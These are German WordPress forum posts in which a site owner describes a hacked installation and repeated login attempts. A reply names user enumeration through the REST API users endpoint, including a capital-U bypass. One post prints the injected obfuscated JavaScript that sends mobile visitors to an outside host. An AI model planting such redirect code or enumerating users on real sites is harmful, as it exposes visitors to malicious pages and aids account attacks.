Beiträge von bauli

    Teste mal die Rest API mit einem großen U bei users. Das "vergessen" die meisten Plugins.

    users mit großem U geschrieben bingt tatsächlich den zweiten User ausser dem Adminstrator
    danke für den Hinweis.
    dzugehöroge Frage; bingt es was, dieses Unterverzeichnis mit htaccess auch noch abzusichern oder führt das zu Funktionsstörungen?

    Zitat

    Bleibt ansonsten z.B. noch der Punkt "gehackte Installation (ähnlich wie z.B. hier)"

    diese gehackte Installation ist ja MEINE (das ist auch MEIN Beitrag); ich hab danmals alles versucht, den Fehler zu beheben, mir blieb aber nur eine Neuinstallation der Seite über, die ich aus diesem Grund nun auch mit dem Security-Plugin abgesichert habe. Genau diese Plugin meldet mir eben Login-Fehlversuche mit Usernamen, die ich als "geheim" eingestuft hätte. Darum bin ich auch sehr empfindlich, was dies betrifft.
    und Nochmals: das ist eine statische Seite, kein Bloq; Gefunden werden soll sie über die Google-Suchfunktion. Es war ja auch Google, der mich damals auf die gehackte Seite aufmerksam gemacht hat.

    und die Abfrage über die

    Zitat

    REST API z.B. [FONT=courier new]deinedomain.de/wp-json/wp/v2/users[/FONT]

    ergibt

    Es gibt auch verlässlich nirgends eine "Autoren-Link" oder sonstigen Vermerk auf einen User im HTML-Code

    [FONT=courier new][/FONT][TABLE="class: treeTable"]
    [TR="class: treeRow stringRow opened"]
    [/TR]
    [TR="class: treeRow stringRow hasChildren opened"]

    [/TR]
    [TR="class: treeRow objectRow opened"]
    [TD="class: treeValueCell objectCell"][/TD]
    [/TR]
    [/TABLE]

    Guten Tag,
    ich betreibe eine rein statische Seite ohne Möglichkeit für Besucher, sich als User anzuloggen oder irgendwelche Kommentare abzugeben.
    Ausserdem ist die Installation mit dem Plugin iThemes Security abgesichert.
    Die Security - Protolldatei zeigt seit neuestem vermehrt fehlgeschlagenen Loginversuche mit dem korrekten Administrator-Namen und auch dem Namen des 2,(Redakteur)-Users (gottseidank mit ungültigem Passwort). Hauptsächlich aus Russland oder China.
    Woher beziehen sich die Hacker den Administrator- oder Username? (das sind nebenbei NICHT alltägliche phantasielosen Namen)

    lg
    bauli

    /nachtrag: das Hauptverzeichnis ist zusätzlich über HTACCESS mit passwort abgesichert

    gute Tag

    Leider ist das auch auf unserer Webseite schon mehrmals der Fall gewesen, zuletzt vor 2 Tagen und definitv KEIN altes Relikt.
    Auch auf unserer Seite ist unter Allgmein/Einstellungen das "jeder kann sich registrieren" NICHT angehakt.
    Zudem beinhaltet die Webseite nur statische <Seiten> und keine <Beiträge>, bietet demzufolge auch nirgends die Möglichkeit an, sich überhaupt zu registrieren.

    Leider wurde hier zusätzlich auch versucht, alle Seiten mit Schadcode zu infiszieren, indem auf jeder Seite eine Script dazugefügt wurde, der offenbar speziell Handies auf irgendwelche anrüchigen Seiten weiterleitet. Aufgefallen ist es nur, weil dieser code auf einigen seiten unkomplett installiert wurde und daher als Text sichtbar war.

    inhalt des Codes:
    --------------------
    if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}
    --------------------
    jeweils am Seitenende zwischen <script> </script> eingebettet

    hat jemand ähnliche Erfahrungen?

    (ja, ich benutze die letzte Version Wordpress 7.1.2, wo angebliche Sicherheitslöcher geflickt wurden)

    lg
    bauli